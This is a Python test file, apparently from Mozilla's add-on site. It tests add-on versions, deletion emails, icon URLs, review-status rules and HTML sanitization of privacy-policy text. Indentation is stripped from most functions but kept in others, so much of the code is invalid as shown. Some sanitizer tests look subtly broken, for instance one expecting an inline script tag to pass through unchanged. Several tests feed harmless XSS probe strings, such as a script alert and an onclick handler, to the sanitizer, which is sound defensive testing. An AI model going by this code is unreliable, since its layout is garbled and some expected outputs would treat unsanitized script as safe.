        """With every version deleted, current_version becomes None."""
        Addon.objects.filter(pk=3723).update(_current_version=None)
        Version.objects.filter(addon=3723).delete()
        a = Addon.objects.get(pk=3723)
        eq_(a.current_version, None)
    def test_latest_version(self):
        """
        Tests that we get the latest version of an addon.
        """
        a = Addon.objects.get(pk=3615)
        eq_(a.latest_version.id, Version.objects.filter(addon=a).latest().id)
    def test_latest_version_no_version(self):
        """latest_version is None once every version is deleted."""
        Addon.objects.filter(pk=3723).update(_current_version=None)
        Version.objects.filter(addon=3723).delete()
        a = Addon.objects.get(pk=3723)
        eq_(a.latest_version, None)
    def test_latest_version_ignore_beta(self):
        """A newer beta-only version must not become latest_version."""
        a = Addon.objects.get(pk=3615)
        v1 = Version.objects.create(addon=a, version='1.0')
        File.objects.create(version=v1)
        eq_(a.latest_version.id, v1.id)
        v2 = Version.objects.create(addon=a, version='2.0beta')
        File.objects.create(version=v2, status=amo.STATUS_BETA)
        v2.save()
        eq_(a.latest_version.id, v1.id)  # Still should be v1
    def test_current_version_unsaved(self):
        """An unsaved Version in the cache slot reads back as None."""
        a = Addon()
        a._current_version = Version()
        eq_(a.current_version, None)
    def test_latest_version_unsaved(self):
        """An unsaved Version in the cache slot reads back as None."""
        a = Addon()
        a._latest_version = Version()
        eq_(a.latest_version, None)
    def test_current_beta_version(self):
        # 5299/50000 come from the base/addon_5299_gcal fixture.
        a = Addon.objects.get(pk=5299)
        eq_(a.current_beta_version.id, 50000)
def _create_new_version(self, addon, status):
    """Create and return a version '99' for `addon` with one file in
    `status`, copying the Firefox min/max compatibility range from the
    add-on's current version."""
    av = addon.current_version.apps.all()[0]
    v = Version.objects.create(addon=addon, version='99')
    File.objects.create(status=status, version=v)
    ApplicationsVersions.objects.create(application_id=amo.FIREFOX.id,
                                        version=v, min=av.min, max=av.max)
    return v
def test_transformer(self):
    """The queryset transformer should prefetch version data, so touching
    the cached version attributes issues zero additional queries."""
    addon = Addon.objects.get(pk=3615)
    # If the transformer works then we won't have any more queries.
    with self.assertNumQueries(0):
        addon._current_version
        addon._backup_version
        addon.latest_version
def _delete(self):
"""Test deleting add-ons."""
a = Addon.objects.get(pk=3615)
a.name = u'é'
a.delete('bye')
eq_(len(mail.outbox), 1)
def test_delete(self):
deleted_count = Addon.with_deleted.count()
self._delete()
eq_(deleted_count, Addon.with_deleted.count())
addon = Addon.with_deleted.get(pk=3615)
eq_(addon.status, amo.STATUS_DELETED)
eq_(addon.slug, None)
eq_(addon.current_version, None)
eq_(addon.app_slug, None)
def _delete_url(self):
"""Test deleting addon has URL in the email."""
a = Addon.objects.get(pk=4594)
url = a.get_url_path()
a.delete('bye')
assert absolutify(url) in mail.outbox[0].body
def test_delete_url(self):
count = Addon.with_deleted.count()
self._delete_url()
eq_(count, Addon.with_deleted.count())
def test_delete_reason(self):
"""Test deleting with a reason gives the reason in the mail."""
reason = u'trêason'
a = Addon.objects.get(pk=3615)
a.name = u'é'
eq_(len(mail.outbox), 0)
a.delete(msg='bye', reason=reason)
eq_(len(mail.outbox), 1)
assert reason in mail.outbox[0].body
def test_delete_status_gone_wild(self):
    """
    Test deleting add-ons where the highest status is zero, but there's a
    non-zero status.
    """
    count = Addon.objects.count()
    a = Addon.objects.get(pk=3615)
    a.status = amo.STATUS_UNREVIEWED
    a.highest_status = 0
    a.delete('bye')
    # Deletion still sends the notification mail ...
    eq_(len(mail.outbox), 1)
    # ... and the add-on is soft-deleted, not removed from the table.
    eq_(count, Addon.with_deleted.count())
def test_delete_incomplete(self):
"""Test deleting incomplete add-ons."""
count = Addon.with_deleted.count()
a = Addon.objects.get(pk=3615)
a.status = 0
a.highest_status = 0
a.save()
a.delete(None)
eq_(len(mail.outbox), 0)
eq_(Addon.with_deleted.count(), count - 1)
def test_delete_searchengine(self):
"""
Test deleting searchengines (which have no guids) should not barf up
the deletion machine.
"""
a = Addon.objects.get(pk=4594)
a.delete('bye')
eq_(len(mail.outbox), 1)
def test_incompatible_latest_apps(self):
a = Addon.objects.get(pk=3615)
eq_(a.incompatible_latest_apps(), [])
av = ApplicationsVersions.objects.get(pk=47881)
av.max = AppVersion.objects.get(pk=97) # Firefox 2.0
av.save()
a = Addon.objects.get(pk=3615)
eq_(a.incompatible_latest_apps(), [amo.FIREFOX])
# Check a search engine addon.
a = Addon.objects.get(pk=4594)
eq_(a.incompatible_latest_apps(), [])
def test_incompatible_asterix(self):
av = ApplicationsVersions.objects.get(pk=47881)
av.max = AppVersion.objects.create(application_id=amo.FIREFOX.id,
version_int=version_int('5.*'),
version='5.*')
av.save()
a = Addon.objects.get(pk=3615)
eq_(a.incompatible_latest_apps(), [])
def test_icon_url(self):
"""
Test for an icon that exists.
"""
a = Addon.objects.get(pk=3615)
expected = (settings.ADDON_ICON_URL % (3, 3615, 32, 0)).rstrip('/0')
assert a.icon_url.startswith(expected)
a = Addon.objects.get(pk=3615)
a.icon_type = None
assert a.icon_url.endswith('icons/default-32.png')
a.icon_type = 'image/png'
assert a.icon_url.endswith('?modified=%s' %
int(time.mktime(a.modified.timetuple())))
a.type = amo.ADDON_WEBAPP # a is now a Webapp, with no icon_hash.
assert a.icon_url.endswith('?modified=never')
a.icon_hash = 'fakehash' # a is now a Webapp, with an icon_hash.
assert a.icon_url.endswith('?modified=fakehash')
def test_icon_url_default(self):
a = Addon.objects.get(pk=3615)
a.update(icon_type='')
default = 'icons/default-32.png'
eq_(a.icon_url.endswith(default), True)
eq_(a.get_icon_url(32).endswith(default), True)
eq_(a.get_icon_url(32, use_default=True).endswith(default), True)
eq_(a.get_icon_url(32, use_default=False), None)
def test_thumbnail_url(self):
"""
Test for the actual thumbnail URL if it should exist, or the no-preview
url.
"""
a = Addon.objects.get(pk=4664)
a.thumbnail_url.index('/previews/thumbs/20/20397.png?modified=')
a = Addon.objects.get(pk=5299)
assert a.thumbnail_url.endswith('/icons/no-preview.png'), (
'No match for %s' % a.thumbnail_url)
def test_is_unreviewed(self):
"""Test if add-on is unreviewed or not"""
# public add-on
a = Addon.objects.get(pk=3615)
assert not a.is_unreviewed(), 'public add-on: is_unreviewed=False'
# unreviewed add-on
a = Addon(status=amo.STATUS_UNREVIEWED)
assert a.is_unreviewed(), 'sandboxed add-on: is_unreviewed=True'
a.status = amo.STATUS_PENDING
assert a.is_unreviewed(), 'pending add-on: is_unreviewed=True'
def test_is_public(self):
    """is_public() is True only for a public add-on that has not been
    disabled by its developer."""
    # Public add-on.
    a = Addon.objects.get(pk=3615)
    # Fixed: the message used to read "should not be is_pulic()" — a typo
    # and inverted wording for a positive assertion.
    assert a.is_public(), 'public add-on should be is_public()'
    # Public, disabled add-on.
    a.disabled_by_user = True
    assert not a.is_public(), (
        'public, disabled add-on should not be is_public()')
    # Lite add-on.
    a.status = amo.STATUS_LITE
    a.disabled_by_user = False
    assert not a.is_public(), 'lite add-on should not be is_public()'
    # Unreviewed add-on.
    a.status = amo.STATUS_UNREVIEWED
    assert not a.is_public(), 'unreviewed add-on should not be is_public()'
    # Unreviewed, disabled add-on.
    a.status = amo.STATUS_UNREVIEWED
    a.disabled_by_user = True
    assert not a.is_public(), (
        'unreviewed, disabled add-on should not be is_public()')
def test_is_featured(self):
"""Test if an add-on is globally featured"""
a = Addon.objects.get(pk=1003)
assert a.is_featured(amo.FIREFOX, 'en-US'), (
'globally featured add-on not recognized')
def test_has_full_profile(self):
"""Test if an add-on's developer profile is complete (public)."""
addon = lambda: Addon.objects.get(pk=3615)
assert not addon().has_full_profile()
a = addon()
a.the_reason = 'some reason'
a.save()
assert not addon().has_full_profile()
a.the_future = 'some future'
a.save()
assert addon().has_full_profile()
a.the_reason = ''
a.the_future = ''
a.save()
assert not addon().has_full_profile()
def test_has_profile(self):
"""Test if an add-on's developer profile is (partially or entirely)
completed.
"""
addon = lambda: Addon.objects.get(pk=3615)
assert not addon().has_profile()
a = addon()
a.the_reason = 'some reason'
a.save()
assert addon().has_profile()
a.the_future = 'some future'
a.save()
assert addon().has_profile()
a.the_reason = ''
a.the_future = ''
a.save()
assert not addon().has_profile()
def test_has_eula(self):
    """has_eula must track the persisted contents of the eula field."""
    def addon():
        # Re-fetch each time to assert against the saved state, not the
        # in-memory instance.  (Was a PEP 8 E731 lambda assignment.)
        return Addon.objects.get(pk=3615)
    assert addon().has_eula
    a = addon()
    a.eula = ''
    a.save()
    assert not addon().has_eula
    a.eula = 'eula'
    a.save()
    assert addon().has_eula
def newlines_helper(self, string_before):
    """Round-trip `string_before` through the add-on's privacy_policy
    field and return the cleaned localized string, i.e. the result of the
    newline/HTML normalization under test."""
    addon = Addon.objects.get(pk=3615)
    addon.privacy_policy = string_before
    addon.save()
    return addon.privacy_policy.localized_string_clean
def test_newlines_normal(self):
before = ("Paragraph one.\n"
"This should be on the very next line.\n\n"
"Should be two nl's before this line.\n\n\n"
"Should be three nl's before this line.\n\n\n\n"
"Should be four nl's before this line.")
after = before # Nothing special; this shouldn't change.
eq_(self.newlines_helper(before), after)
def test_newlines_ul(self):
before = ("<ul>\n\n"
"<li>No nl's between the ul and the li.</li>\n\n"
"<li>No nl's between li's.\n\n"
"But there should be two before this line.</li>\n\n"
"</ul>")
after = ("<ul>"
"<li>No nl's between the ul and the li.</li>"
"<li>No nl's between li's.\n\n"
"But there should be two before this line.</li>"
"</ul>")
eq_(self.newlines_helper(before), after)
def test_newlines_ul_tight(self):
before = ("There should be one nl between this and the ul.\n"
"<ul><li>test</li><li>test</li></ul>\n"
"There should be no nl's above this line.")
after = ("There should be one nl between this and the ul.\n"
"<ul><li>test</li><li>test</li></ul>"
"There should be no nl's above this line.")
eq_(self.newlines_helper(before), after)
def test_newlines_ul_loose(self):
before = ("There should be two nl's between this and the ul.\n\n"
"<ul><li>test</li><li>test</li></ul>\n\n"
"There should be one nl above this line.")
after = ("There should be two nl's between this and the ul.\n\n"
"<ul><li>test</li><li>test</li></ul>\n"
"There should be one nl above this line.")
eq_(self.newlines_helper(before), after)
def test_newlines_blockquote_tight(self):
before = ("There should be one nl below this.\n"
"<blockquote>Hi</blockquote>\n"
"There should be no nl's above this.")
after = ("There should be one nl below this.\n"
"<blockquote>Hi</blockquote>"
"There should be no nl's above this.")
eq_(self.newlines_helper(before), after)
def test_newlines_blockquote_loose(self):
before = ("There should be two nls below this.\n\n"
"<blockquote>Hi</blockquote>\n\n"
"There should be one nl above this.")
after = ("There should be two nls below this.\n\n"
"<blockquote>Hi</blockquote>\n"
"There should be one nl above this.")
eq_(self.newlines_helper(before), after)
def test_newlines_inline(self):
before = ("If we end a paragraph w/ a <b>non-block-level tag</b>\n\n"
"<b>The newlines</b> should be kept")
after = before # Should stay the same
eq_(self.newlines_helper(before), after)
def test_newlines_code_inline(self):
before = ("Code tags aren't blocks.\n\n"
"<code>alert(test);</code>\n\n"
"See?")
after = before # Should stay the same
eq_(self.newlines_helper(before), after)
def test_newlines_li_newlines(self):
before = ("<ul><li>\nxx</li></ul>")
after = ("<ul><li>xx</li></ul>")
eq_(self.newlines_helper(before), after)
before = ("<ul><li>xx\n</li></ul>")
after = ("<ul><li>xx</li></ul>")
eq_(self.newlines_helper(before), after)
before = ("<ul><li>xx\nxx</li></ul>")
after = ("<ul><li>xx\nxx</li></ul>")
eq_(self.newlines_helper(before), after)
before = ("<ul><li></li></ul>")
after = ("<ul><li></li></ul>")
eq_(self.newlines_helper(before), after)
# All together now
before = ("<ul><li>\nxx</li> <li>xx\n</li> <li>xx\nxx</li> "
"<li></li>\n</ul>")
after = ("<ul><li>xx</li> <li>xx</li> <li>xx\nxx</li> "
"<li></li></ul>")
eq_(self.newlines_helper(before), after)
def test_newlines_empty_tag(self):
before = ("This is a <b></b> test!")
after = before
eq_(self.newlines_helper(before), after)
def test_newlines_empty_tag_nested(self):
before = ("This is a <b><i></i></b> test!")
after = before
eq_(self.newlines_helper(before), after)
def test_newlines_empty_tag_block_nested(self):
b = ("Test.\n\n<blockquote><ul><li></li></ul></blockquote>\ntest.")
a = ("Test.\n\n<blockquote><ul><li></li></ul></blockquote>test.")
eq_(self.newlines_helper(b), a)
def test_newlines_empty_tag_block_nested_spaced(self):
before = ("Test.\n\n<blockquote>\n\n<ul>\n\n<li>"
"</li>\n\n</ul>\n\n</blockquote>\ntest.")
after = ("Test.\n\n<blockquote><ul><li></li></ul></blockquote>test.")
eq_(self.newlines_helper(before), after)
def test_newlines_li_newlines_inline(self):
before = ("<ul><li>\n<b>test\ntest\n\ntest</b>\n</li>"
"<li>Test <b>test</b> test.</li></ul>")
after = ("<ul><li><b>test\ntest\n\ntest</b></li>"
"<li>Test <b>test</b> test.</li></ul>")
eq_(self.newlines_helper(before), after)
def test_newlines_li_all_inline(self):
before = ("Test with <b>no newlines</b> and <code>block level "
"stuff</code> to see what happens.")
after = before # Should stay the same
eq_(self.newlines_helper(before), after)
def test_newlines_spaced_blocks(self):
before = ("<blockquote>\n\n<ul>\n\n<li>\n\ntest\n\n</li>\n\n"
"</ul>\n\n</blockquote>")
after = "<blockquote><ul><li>test</li></ul></blockquote>"
eq_(self.newlines_helper(before), after)
def test_newlines_spaced_inline(self):
before = "Line.\n\n<b>\nThis line is bold.\n</b>\n\nThis isn't."
after = before
eq_(self.newlines_helper(before), after)
def test_newlines_nested_inline(self):
before = "<b>\nThis line is bold.\n\n<i>This is also italic</i></b>"
after = before
eq_(self.newlines_helper(before), after)
def test_newlines_xss_script(self):
before = "<script>\n\nalert('test');\n</script>"
after = "<script>\n\nalert('test');\n</script>"
eq_(self.newlines_helper(before), after)
def test_newlines_xss_inline(self):
before = "<b onclick=\"alert('test');\">test</b>"
after = "<b>test</b>"
eq_(self.newlines_helper(before), after)
@patch('amo.helpers.urlresolvers.get_outgoing_url')
def test_newlines_attribute_link_doublequote(self, mock_get_outgoing_url):
mock_get_outgoing_url.return_value = 'http://google.com'
before = '<a href="http://google.com">test</a>'
parsed = self.newlines_helper(before)
eq_(parsed, '<a rel="nofollow" href="http://google.com">test</a>')
def test_newlines_attribute_singlequote(self):
before = "<abbr title='laugh out loud'>lol</abbr>"
after = '<abbr title="laugh out loud">lol</abbr>'
eq_(self.newlines_helper(before), after)
def test_newlines_attribute_doublequote(self):
before = '<abbr title="laugh out loud">lol</abbr>'
after = before
eq_(self.newlines_helper(before), after)
def test_newlines_attribute_nestedquotes_doublesingle(self):
before = '<abbr title="laugh \'out\' loud">lol</abbr>'
after = before
eq_(self.newlines_helper(before), after)
def test_newlines_attribute_nestedquotes_singledouble(self):
before = '<abbr title=\'laugh "out" loud\'>lol</abbr>'
after = before
eq_(self.newlines_helper(before), after)
def test_newlines_unclosed_b(self):
before = ("<b>test")
after = ("<b>test</b>")
eq_(self.newlines_helper(before), after)
def test_newlines_unclosed_b_wrapped(self):
before = ("This is a <b>test")
after = ("This is a <b>test</b>")
eq_(self.newlines_helper(before), after)
def test_newlines_unclosed_li(self):
before = ("<ul><li>test</ul>")
after = ("<ul><li>test</li></ul>")
eq_(self.newlines_helper(before), after)
def test_newlines_malformed_faketag(self):
before = "<madonna"
after = ""
eq_(self.newlines_helper(before), after)
def test_newlines_correct_faketag(self):
before = "<madonna>"
after = "<madonna>"
eq_(self.newlines_helper(before), after)
def test_newlines_malformed_tag(self):
before = "<strong"
after = ""
eq_(self.newlines_helper(before), after)
def test_newlines_malformed_faketag_surrounded(self):
before = "This is a <test of bleach"
after = 'This is a'
eq_(self.newlines_helper(before), after)
def test_newlines_malformed_tag_surrounded(self):
before = "This is a <strong of bleach"
after = "This is a"
eq_(self.newlines_helper(before), after)
def test_newlines_less_than(self):
before = "3 < 5"
after = "3 < 5"
eq_(self.newlines_helper(before), after)
def test_newlines_less_than_tight(self):
before = "abc 3<5 def"
after = "abc 3<5 def"
eq_(self.newlines_helper(before), after)
def test_app_numeric_slug(self):
cat = Category.objects.get(id=22)
cat.slug = 123
with self.assertRaises(ValidationError):
cat.full_clean()
def test_app_categories(self):
addon = lambda: Addon.objects.get(pk=3615)
c22 = Category.objects.get(id=22)
c22.name = 'CCC'
c22.save()
c23 = Category.objects.get(id=23)
c23.name = 'BBB'
c23.save()
c24 = Category.objects.get(id=24)
c24.name = 'AAA'
c24.save()
cats = addon().all_categories
eq_(cats, [c22, c23, c24])
for cat in cats:
eq_(cat.application.id, amo.FIREFOX.id)
cats = [c24, c23, c22]
app_cats = [(amo.FIREFOX, cats)]
eq_(addon().app_categories, app_cats)
tb = Application.objects.get(id=amo.THUNDERBIRD.id)
c = Category(application=tb, name='XXX', type=addon().type, count=1,
weight=1)
c.save()
AddonCategory.objects.create(addon=addon(), category=c)
c24.save() # Clear the app_categories cache.
app_cats += [(amo.THUNDERBIRD, [c])]
eq_(addon().app_categories, app_cats)
def test_app_categories_sunbird(self):
get_addon = lambda: Addon.objects.get(pk=3615)
addon = get_addon()
# This add-on is already associated with three Firefox categories.
cats = sorted(addon.categories.all(), key=lambda x: x.name)
eq_(addon.app_categories, [(amo.FIREFOX, cats)])
# Associate this add-on with a Sunbird category.
a = Application.objects.create(id=amo.SUNBIRD.id)
c2 = Category.objects.create(application=a, type=amo.ADDON_EXTENSION,
name='Sunny D')
AddonCategory.objects.create(addon=addon, category=c2)
# Sunbird category should be excluded.
eq_(get_addon().app_categories, [(amo.FIREFOX, cats)])
def test_review_replies(self):
"""
Make sure that developer replies are not returned as if they were
original reviews.
"""
addon = Addon.objects.get(id=3615)
u = UserProfile.objects.get(pk=999)
version = addon.current_version
new_review = Review(version=version, user=u, rating=2, body='hello',
addon=addon)
new_review.save()
new_reply = Review(version=version, user=addon.authors.all()[0],
addon=addon, reply_to=new_review,
rating=2, body='my reply')
new_reply.save()
review_list = [r.pk for r in addon.reviews]
assert new_review.pk in review_list, (
'Original review must show up in review list.')
assert new_reply.pk not in review_list, (
'Developer reply must not show up in review list.')
def test_show_beta(self):
# Addon.current_beta_version will be empty, so show_beta is False.
a = Addon(status=amo.STATUS_PUBLIC)
assert not a.show_beta
@patch('addons.models.Addon.current_beta_version')
def test_show_beta_with_beta_version(self, beta_mock):
beta_mock.return_value = object()
# Fake current_beta_version to return something truthy.
a = Addon(status=amo.STATUS_PUBLIC)
assert a.show_beta
# We have a beta version but status has to be public.
a.status = amo.STATUS_UNREVIEWED
assert not a.show_beta
def test_update_logs(self):
addon = Addon.objects.get(id=3615)
set_user(UserProfile.objects.all()[0])
addon.versions.all().delete()
entries = ActivityLog.objects.all()
eq_(entries[0].action, amo.LOG.CHANGE_STATUS.id)
def test_can_request_review_waiting_period(self):
now = datetime.now()
a = Addon.objects.create(type=1)
v = Version.objects.create(addon=a)
# The first LITE version is only 5 days old, no dice.
first_f = File.objects.create(status=amo.STATUS_LITE, version=v)
first_f.update(datestatuschanged=now - timedelta(days=5),
created=now - timedelta(days=20))
# TODO(andym): can this go in Addon.objects.create? bug 618444
a.update(status=amo.STATUS_LITE)
eq_(a.can_request_review(), ())
# Now the first LITE is > 10 days old, change can happen.
first_f.update(datestatuschanged=now - timedelta(days=11))
# Add a second file, to be sure that we test the date
# of the first created file.
second_f = File.objects.create(status=amo.STATUS_LITE, version=v)
second_f.update(datestatuschanged=now - timedelta(days=5))
eq_(a.status, amo.STATUS_LITE)
eq_(a.can_request_review(), (amo.STATUS_PUBLIC,))
def test_days_until_full_nomination(self):
# Normalize to 12am for reliable day subtraction:
now = datetime.now().date()
a = Addon.objects.create(type=1)
v = Version.objects.create(addon=a)
f = File.objects.create(status=amo.STATUS_LITE, version=v)
a.update(status=amo.STATUS_LITE)
f.update(datestatuschanged=now - timedelta(days=4))
eq_(a.days_until_full_nomination(), 6)
f.update(datestatuschanged=now - timedelta(days=1))
eq_(a.days_until_full_nomination(), 9)
f.update(datestatuschanged=now - timedelta(days=10))
eq_(a.days_until_full_nomination(), 0)
f.update(datestatuschanged=now)
eq_(a.days_until_full_nomination(), 10)
# Only calculate days from first submitted version:
f.update(datestatuschanged=now - timedelta(days=2),
created=now - timedelta(days=2))
# Ignore this one:
f2 = File.objects.create(status=amo.STATUS_LITE, version=v)
f2.update(datestatuschanged=now - timedelta(days=1),
created=now - timedelta(days=1))
eq_(a.days_until_full_nomination(), 8)
# Wrong status:
f.update(datestatuschanged=now - timedelta(days=4))
a.update(status=amo.STATUS_PUBLIC)
eq_(a.days_until_full_nomination(), 0)
def setup_files(self, status):
    """Create a bare extension with one version and one file in `status`;
    return the (addon, version) pair."""
    addon = Addon.objects.create(type=1)
    version = Version.objects.create(addon=addon)
    File.objects.create(status=status, version=version)
    return addon, version
def test_no_change_disabled_user(self):
addon, version = self.setup_files(amo.STATUS_UNREVIEWED)
addon.update(status=amo.STATUS_PUBLIC)
addon.update(disabled_by_user=True)
version.save()
eq_(addon.status, amo.STATUS_PUBLIC)
assert addon.is_disabled
def test_no_change_disabled(self):
addon = Addon.objects.create(type=1)
version = Version.objects.create(addon=addon)
addon.update(status=amo.STATUS_DISABLED)
version.save()
eq_(addon.status, amo.STATUS_DISABLED)
assert addon.is_disabled
def test_no_change_deleted(self):
addon = Addon.objects.create(type=1)
version = Version.objects.create(addon=addon)
addon.update(status=amo.STATUS_DELETED)
version.save()
eq_(addon.status, amo.STATUS_DELETED)
assert addon.is_deleted
def test_can_alter_in_prelim(self):
addon, version = self.setup_files(amo.STATUS_LITE)
addon.update(status=amo.STATUS_LITE)
version.save()
eq_(addon.status, amo.STATUS_LITE)
def test_removing_public(self):
addon, version = self.setup_files(amo.STATUS_UNREVIEWED)
addon.update(status=amo.STATUS_PUBLIC)
version.save()
eq_(addon.status, amo.STATUS_UNREVIEWED)
def test_removing_public_with_prelim(self):
addon, version = self.setup_files(amo.STATUS_LITE)
addon.update(status=amo.STATUS_PUBLIC)
version.save()
eq_(addon.status, amo.STATUS_LITE)
def test_can_request_review_no_files(self):
addon = Addon.objects.get(pk=3615)
addon.versions.all()[0].files.all().delete()
eq_(addon.can_request_review(), ())
def test_can_request_review_rejected(self):
addon = Addon.objects.get(pk=3615)
addon.latest_version.files.update(status=amo.STATUS_DISABLED)
eq_(addon.can_request_review(), ())
def check(self, status, exp, kw=None):
    """Put add-on 3615 into `status` (plus any extra field overrides in
    `kw`) and assert that can_request_review() returns `exp`.

    `kw` now defaults to None instead of a shared mutable dict (the
    classic mutable-default-argument pitfall); passing a dict positionally
    or by keyword works exactly as before.
    """
    addon = Addon.objects.get(pk=3615)
    changes = {'status': status, 'disabled_by_user': False}
    changes.update(**(kw or {}))
    addon.update(**changes)
    eq_(addon.can_request_review(), exp)
def test_can_request_review_null(self):
self.check(amo.STATUS_NULL, (amo.STATUS_LITE, amo.STATUS_PUBLIC))
def test_can_request_review_null_disabled(self):
self.check(amo.STATUS_NULL, (), {'disabled_by_user': True})
def test_can_request_review_unreviewed(self):
self.check(amo.STATUS_UNREVIEWED, (amo.STATUS_PUBLIC,))
def test_can_request_review_nominated(self):
self.check(amo.STATUS_NOMINATED, (amo.STATUS_LITE,))
def test_can_request_review_public(self):
self.check(amo.STATUS_PUBLIC, ())
def test_can_request_review_disabled(self):
self.check(amo.STATUS_DISABLED, ())
def test_can_request_review_deleted(self):
self.check(amo.STATUS_DELETED, ())
def test_can_request_review_lite(self):
self.check(amo.STATUS_LITE, (amo.STATUS_PUBLIC,))
def test_can_request_review_lite_and_nominated(self):
self.check(amo.STATUS_LITE_AND_NOMINATED, ())
def test_can_request_review_purgatory(self):
self.check(amo.STATUS_PURGATORY, (amo.STATUS_LITE, amo.STATUS_PUBLIC,))
def test_none_homepage(self):
# There was an odd error when a translation was set to None.
Addon.objects.create(homepage=None, type=amo.ADDON_EXTENSION)
def test_slug_isdigit(self):
a = Addon.objects.create(type=1, name='xx', slug='123')
eq_(a.slug, '123~')
a.slug = '44'
a.save()
eq_(a.slug, '44~')
def test_slug_isblacklisted(self):
# When an addon is uploaded, it doesn't use the form validation,
# so we'll just mangle the slug if its blacklisted.
a = Addon.objects.create(type=1, name='xx', slug='validate')
eq_(a.slug, 'validate~')
a.slug = 'validate'
a.save()
eq_(a.slug, 'validate~')
def delete(self):
    """Delete add-on 3615 and check exactly one notification mail is sent."""
    addon = Addon.objects.get(id=3615)
    eq_(len(mail.outbox), 0)
    addon.delete('so long and thanks for all the fish')
    eq_(len(mail.outbox), 1)
def test_delete_to(self):
self.delete()
eq_(mail.outbox[0].to, [settings.FLIGTAR])
def test_delete_by(self):
    """The deletion mail should identify the acting user by id."""
    try:
        user = Addon.objects.get(id=3615).authors.all()[0]
        set_user(user)
        self.delete()
        # 55021 — presumably the fixture author's user id; confirm
        # against base/users if it changes.
        assert 'DELETED BY: 55021' in mail.outbox[0].body
    finally:
        # Always clear the thread-local user so other tests are unaffected.
        set_user(None)
def test_delete_by_unknown(self):
self.delete()
assert 'DELETED BY: Unknown' in mail.outbox[0].body
def test_view_source(self):
# view_source should default to True.
a = Addon.objects.create(type=1)
assert a.view_source
@patch('files.models.File.hide_disabled_file')
def test_admin_disabled_file_hidden(self, hide_mock):
a = Addon.objects.get(id=3615)
a.status = amo.STATUS_PUBLIC
a.save()
assert not hide_mock.called
a.status = amo.STATUS_DISABLED
a.save()
assert hide_mock.called
@patch('files.models.File.hide_disabled_file')
def test_user_disabled_file_hidden(self, hide_mock):
a = Addon.objects.get(id=3615)
a.disabled_by_user = False
a.save()
assert not hide_mock.called
a.disabled_by_user = True
a.save()
assert hide_mock.called
def test_set_nomination(self):
a = Addon.objects.get(id=3615)
a.update(status=amo.STATUS_NULL)
for s in (amo.STATUS_NOMINATED, amo.STATUS_LITE_AND_NOMINATED):
a.versions.latest().update(nomination=None)
a.update(status=s)
assert a.versions.latest().nomination
def test_new_version_inherits_nomination(self):
a = Addon.objects.get(id=3615)
ver = 10
for st in (amo.STATUS_NOMINATED, amo.STATUS_LITE_AND_NOMINATED):
a.update(status=st)
old_ver = a.versions.latest()
v = Version.objects.create(addon=a, version=str(ver))
eq_(v.nomination, old_ver.nomination)
ver += 1
def test_beta_version_does_not_inherit_nomination(self):
a = Addon.objects.get(id=3615)
a.update(status=amo.STATUS_NULL)
v = Version.objects.create(addon=a, version='1.0')
v.nomination = None
v.save()
a.update(status=amo.STATUS_NOMINATED)
File.objects.create(version=v, status=amo.STATUS_BETA,
filename='foobar.xpi')
v.version = '1.1'
v.save()
eq_(v.nomination, None)
def test_lone_version_does_not_inherit_nomination(self):
a = Addon.objects.get(id=3615)
for v in Version.objects.all():
v.delete()
v = Version.objects.create(addon=a, version='1.0')
eq_(v.nomination, None)
def test_reviwed_addon_does_not_inherit_nomination(self):
a = Addon.objects.get(id=3615)
ver = 10
for st in (amo.STATUS_PUBLIC, amo.STATUS_BETA, amo.STATUS_NULL):
a.update(status=st)
v = Version.objects.create(addon=a, version=str(ver))
eq_(v.nomination, None)
ver += 1
def test_nomination_no_version(self):
# Check that the on_change method still works if there are no versions.
a = Addon.objects.get(id=3615)
a.versions.all().delete()
a.update(status=amo.STATUS_NOMINATED)
def test_nomination_already_set(self):
addon = Addon.objects.get(id=3615)
earlier = datetime.today() - timedelta(days=2)
addon.versions.latest().update(nomination=earlier)
addon.update(status=amo.STATUS_NOMINATED)
eq_(addon.versions.latest().nomination.date(), earlier.date())
def test_category_transform(self):
addon = Addon.objects.get(id=3615)
cats = addon.categories.filter(application=amo.FIREFOX.id)
names = [c.name for c in cats]
assert addon.get_category(amo.FIREFOX.id).name in names
class TestAddonDelete(amo.tests.TestCase):
    """Deleting an add-on must cascade through every related model."""

    def test_cascades(self):
        addon = Addon.objects.create(type=amo.ADDON_EXTENSION)
        # Create one row in each table that hangs off Addon via an FK.
        AddonCategory.objects.create(addon=addon,
            category=Category.objects.create(type=amo.ADDON_EXTENSION))
        AddonDeviceType.objects.create(addon=addon,
            device_type=DEVICE_TYPES.keys()[0])
        AddonUpsell.objects.create(free=addon, premium=addon)
        AddonUser.objects.create(addon=addon,
            user=UserProfile.objects.create())
        AppSupport.objects.create(addon=addon,
            app=Application.objects.create())
        Preview.objects.create(addon=addon)
        AddonPremium.objects.create(addon=addon)
        AddonPaymentData.objects.create(addon=addon)
        # This should not throw any FK errors if all the cascades work.
        addon.delete()
class TestAddonModelsFeatured(amo.tests.TestCase):
    """Addon.featured_random: featured add-on ids per app and locale."""
    fixtures = ['base/apps', 'base/appversion', 'base/users',
                'addons/featured', 'base/addon_3615', 'base/collections',
                'base/featured']

    def setUp(self):
        # Addon._featured keeps an in-process cache we need to clear.
        if hasattr(Addon, '_featured'):
            del Addon._featured

    def _test_featured_random(self):
        # Expected ids come from the featured/collections fixtures.
        f = Addon.featured_random(amo.FIREFOX, 'en-US')
        eq_(sorted(f), [1001, 1003, 2464, 3481, 7661, 15679])
        # For 'fr' the id featured only in en-US (3481) is absent.
        f = Addon.featured_random(amo.FIREFOX, 'fr')
        eq_(sorted(f), [1001, 1003, 2464, 7661, 15679])
        # Nothing is featured for Thunderbird in these fixtures.
        f = Addon.featured_random(amo.THUNDERBIRD, 'en-US')
        eq_(f, [])

    def test_featured_random(self):
        self._test_featured_random()
class TestBackupVersion(amo.tests.TestCase):
    """Addon.backup_version: the newest version still compatible with an
    older application release once the current version's minimum app
    version has moved past it."""
    fixtures = ['addons/update', 'base/apps', 'base/appversion',
                'base/platforms']

    def setUp(self):
        # pk threshold for "new" versions; name suggests this is the pk
        # of version 1.2.0 in the fixture — confirm against addons/update.
        self.version_1_2_0 = 105387
        self.addon = Addon.objects.get(pk=1865)
        set_user(None)

    def setup_new_version(self):
        # Raise the min app version of every version from 1.2.0 on to
        # Firefox 4.0b1, so older versions become the backup candidates.
        for version in Version.objects.filter(pk__gte=self.version_1_2_0):
            appversion = version.apps.all()[0]
            appversion.min = AppVersion.objects.get(version='4.0b1')
            appversion.save()

    def test_no_backup_version(self):
        # Without the min-version bump there is nothing to back up to.
        self.addon.update_version()
        eq_(self.addon.backup_version, None)
